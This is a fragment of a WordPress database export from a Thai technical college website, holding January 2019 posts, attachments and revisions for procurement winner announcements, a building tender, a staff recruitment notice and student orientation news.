(5059, 3, '2019-01-21 09:00:35', '2019-01-21 02:00:35', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C-%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%9D%E0%B8%B6%E0%B8%81%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-1-%E0%B8%8A%E0%B8%B8%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์ชุดฝึกหุ่นยนต์อุตสาหกรรม จำนวน ๑ ชุด โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2-7', '', '', '2019-01-21 09:00:35', '2019-01-21 02:00:35', '', 0, 'http://www.technicrayong.ac.th/?p=5059', 159, 'post', '', 0),
(5060, 3, '2019-01-21 09:00:09', '2019-01-21 02:00:09', '', 'ประกาศ รายชื่อผู้ชนะการประะกวดราคาซื้อครุภัณฑ์ ชุดฝึกหุ่นยนต์อุตสาหกรรม จำนวน 1 ชุด', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2-7', '', '', '2019-01-21 09:00:09', '2019-01-21 02:00:09', '', 5059, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-รายชื่อผู้ชนะการประะกวดราคาซื้อครุภัณฑ์-ชุดฝึกหุ่นยนต์อุตสาหกรรม-จำนวน-1-ชุด.pdf', 0, 'attachment', 'application/pdf', 0),
(5061, 3, '2019-01-21 09:00:35', '2019-01-21 02:00:35', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C-%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%9D%E0%B8%B6%E0%B8%81%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-1-%E0%B8%8A%E0%B8%B8%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์ชุดฝึกหุ่นยนต์อุตสาหกรรม จำนวน ๑ ชุด โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '5059-revision-v1', '', '', '2019-01-21 09:00:35', '2019-01-21 02:00:35', '', 5059, 'http://www.technicrayong.ac.th/5059-revision-v1/', 0, 'revision', '', 0),
(5062, 3, '2019-01-21 10:17:49', '2019-01-21 03:17:49', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D746316315744559%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันเสาร์ที่ ๑๙ มกราคม ๒๕๖๒ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง คณะผู้บริหาร พบปะและชี้แจงการเรียนในสายอาชีพ ให้แก่นักเรียนที่มารายงานตัวมอบตัว(รอบโควตา) ในระดับ ปวช. ประจำปีการศึกษา ๒๕๖๒ ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%80%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%99-%e0%b8%a1%e0%b8%81%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b9%92%e0%b9%95', '', '', '2019-01-29 16:32:33', '2019-01-29 09:32:33', '', 0, 'http://www.technicrayong.ac.th/?p=5062', 158, 'post', '', 0),
(5063, 3, '2019-01-21 10:17:14', '2019-01-21 03:17:14', '', '50049664_746313819078142_4963044996421779456_o', '', 'inherit', 'closed', 'closed', '', '50049664_746313819078142_4963044996421779456_o', '', '', '2019-01-21 10:17:14', '2019-01-21 03:17:14', '', 5062, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/50049664_746313819078142_4963044996421779456_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5064, 3, '2019-01-21 10:17:49', '2019-01-21 03:17:49', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D746316315744559%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันเสาร์ที่ ๑๙ มกราคม ๒๕๖๒ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง คณะผู้บริหาร พบปะชี้และชี้แจงการเรียนในสายอาชีพ ให้แก่นักเรียนที่มารายงานตัวมอบตัว(รอบโควตา) ในระดับ ปวช. ประจำปีการศึกษา ๒๕๖๒ ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '5062-revision-v1', '', '', '2019-01-21 10:17:49', '2019-01-21 03:17:49', '', 5062, 'http://www.technicrayong.ac.th/5062-revision-v1/', 0, 'revision', '', 0),
(5065, 3, '2019-01-21 10:21:15', '2019-01-21 03:21:15', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D746918845684306%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอาทิตย์ที่ ๒๐ มกราคม ๒๕๖๒ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง คณะผู้บริหาร พบปะชี้และชี้แจงการเรียนในสายอาชีพ ให้แก่นักศึกษาที่มารายงานตัวมอบตัว(รอบโควตา) ในระดับ ปวส. ประจำปีการศึกษา ๒๕๖๒ ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b2%e0%b8%97%e0%b8%b4%e0%b8%95%e0%b8%a2%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%90-%e0%b8%a1%e0%b8%81%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%a1', '', '', '2019-01-21 10:21:15', '2019-01-21 03:21:15', '', 0, 'http://www.technicrayong.ac.th/?p=5065', 157, 'post', '', 0),
(5066, 3, '2019-01-21 10:20:43', '2019-01-21 03:20:43', '', '50151314_746917052351152_1974965033741844480_o', '', 'inherit', 'closed', 'closed', '', '50151314_746917052351152_1974965033741844480_o', '', '', '2019-01-21 10:20:43', '2019-01-21 03:20:43', '', 5065, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/50151314_746917052351152_1974965033741844480_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5067, 3, '2019-01-21 10:21:15', '2019-01-21 03:21:15', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D746918845684306%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอาทิตย์ที่ ๒๐ มกราคม ๒๕๖๒ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง คณะผู้บริหาร พบปะชี้และชี้แจงการเรียนในสายอาชีพ ให้แก่นักศึกษาที่มารายงานตัวมอบตัว(รอบโควตา) ในระดับ ปวส. ประจำปีการศึกษา ๒๕๖๒ ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '5065-revision-v1', '', '', '2019-01-21 10:21:15', '2019-01-21 03:21:15', '', 5065, 'http://www.technicrayong.ac.th/5065-revision-v1/', 0, 'revision', '', 0),
(5071, 3, '2019-01-21 13:27:17', '2019-01-21 06:27:17', '', 'ปฏิทินรับสมัครสอบคัดเลือก ปี62', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%97%e0%b8%b4%e0%b8%99%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5-2', '', '', '2019-01-21 13:27:17', '2019-01-21 06:27:17', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ปฏิทินรับสมัครสอบคัดเลือก-ปี62.jpg', 0, 'attachment', 'image/jpeg', 0),
(5072, 3, '2019-01-21 13:28:45', '2019-01-21 06:28:45', '', 'ขั้นตอนการสมัครเรียน ปี62', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b8%b1%e0%b9%89%e0%b8%99%e0%b8%95%e0%b8%ad%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%9b%e0%b8%b56', '', '', '2019-01-21 13:28:45', '2019-01-21 06:28:45', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ขั้นตอนการสมัครเรียน-ปี62.jpg', 0, 'attachment', 'image/jpeg', 0),
(5075, 3, '2019-01-21 15:57:31', '2019-01-21 08:57:31', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8CCMT-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-%E0%B9%91-%E0%B8%8A%E0%B8%B8%E0%B8%94-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์หุ่นยนต์เชื่อมพร้อมชุดเชื่อม CMT จำนวน ๑ ชุด โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2-8', '', '', '2019-01-21 16:27:16', '2019-01-21 09:27:16', '', 0, 'http://www.technicrayong.ac.th/?p=5075', 156, 'post', '', 0),
(5076, 3, '2019-01-21 15:43:30', '2019-01-21 08:43:30', '', 'ประกาศ รายชื่อผู้ชนะการประกวดราคาซื้อครุภัณฑ์หุ่นยนต์CMT จำนวน ๑ ชุด', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2-8', '', '', '2019-01-21 15:43:30', '2019-01-21 08:43:30', '', 5075, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-รายชื่อผู้ชนะการประกวดราคาซื้อครุภัณฑ์หุ่นยนต์CMT-จำนวน-๑-ชุด.pdf', 0, 'attachment', 'application/pdf', 0),
(5079, 3, '2019-01-21 15:57:31', '2019-01-21 08:57:31', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8CCMT-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-%E0%B9%91-%E0%B8%8A%E0%B8%B8%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์หุ่นยนต์เชื่อมพร้อมชุดเชื่อม CMT จำนวน ๑ ชุด โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '5075-revision-v1', '', '', '2019-01-21 15:57:31', '2019-01-21 08:57:31', '', 5075, 'http://www.technicrayong.ac.th/5075-revision-v1/', 0, 'revision', '', 0),
(5080, 3, '2019-01-21 16:26:18', '2019-01-21 09:26:18', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%84%E0%B8%A5%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88-3-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2edit.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน ๓ อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80-9', '', '', '2019-01-22 16:20:49', '2019-01-22 09:20:49', '', 0, 'http://www.technicrayong.ac.th/?p=5080', 155, 'post', '', 0),
(5081, 3, '2019-01-21 16:25:58', '2019-01-21 09:25:58', '', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว เจ้าหน้าที่ 3 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80-11', '', '', '2019-01-21 16:25:58', '2019-01-21 09:25:58', '', 5080, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว-เจ้าหน้าที่-3-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(5082, 3, '2019-01-21 16:26:18', '2019-01-21 09:26:18', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%84%E0%B8%A5%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88-3-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน ๓ อัตรา', '', 'inherit', 'closed', 'closed', '', '5080-revision-v1', '', '', '2019-01-21 16:26:18', '2019-01-21 09:26:18', '', 5080, 'http://www.technicrayong.ac.th/5080-revision-v1/', 0, 'revision', '', 0),
(5083, 3, '2019-01-21 16:26:58', '2019-01-21 09:26:58', '', 'ประกาศ รายชื่อผู้ชนะการประกวดราคาซื้อครุภัณฑ์หุ่นยนต์CMT จำนวน ๑ ชุด', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2-9', '', '', '2019-01-21 16:26:58', '2019-01-21 09:26:58', '', 5075, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-รายชื่อผู้ชนะการประกวดราคาซื้อครุภัณฑ์หุ่นยนต์CMT-จำนวน-๑-ชุด-1.pdf', 0, 'attachment', 'application/pdf', 0),
(5084, 3, '2019-01-21 16:27:16', '2019-01-21 09:27:16', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8CCMT-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-%E0%B9%91-%E0%B8%8A%E0%B8%B8%E0%B8%94-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์หุ่นยนต์เชื่อมพร้อมชุดเชื่อม CMT จำนวน ๑ ชุด โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '5075-revision-v1', '', '', '2019-01-21 16:27:16', '2019-01-21 09:27:16', '', 5075, 'http://www.technicrayong.ac.th/5075-revision-v1/', 0, 'revision', '', 0),
(5085, 3, '2019-01-22 08:55:24', '2019-01-22 01:55:24', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%AD%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-1-%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาจ้างก่อสร้างอาคารเรียนและปฏิบัติการพื้นที่ไม่ต่ำกว่า ๑,๙๒๐ ตารางเมตร จำนวน ๑ หลัง ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%81-3', '', '', '2019-01-22 08:55:24', '2019-01-22 01:55:24', '', 0, 'http://www.technicrayong.ac.th/?p=5085', 154, 'post', '', 0),
(5086, 3, '2019-01-22 08:47:32', '2019-01-22 01:47:32', '', 'ประกาศ ประกวดราคาจ้างก่อสร้างอาคารเรียน จำนวน 1 หลัง', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%81-3', '', '', '2019-01-22 08:47:32', '2019-01-22 01:47:32', '', 5085, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-ประกวดราคาจ้างก่อสร้างอาคารเรียน-จำนวน-1-หลัง.pdf', 0, 'attachment', 'application/pdf', 0),
(5087, 3, '2019-01-22 08:55:24', '2019-01-22 01:55:24', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%AD%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-1-%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาจ้างก่อสร้างอาคารเรียนและปฏิบัติการพื้นที่ไม่ต่ำกว่า ๑,๙๒๐ ตารางเมตร จำนวน ๑ หลัง ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '5085-revision-v1', '', '', '2019-01-22 08:55:24', '2019-01-22 01:55:24', '', 5085, 'http://www.technicrayong.ac.th/5085-revision-v1/', 0, 'revision', '', 0),
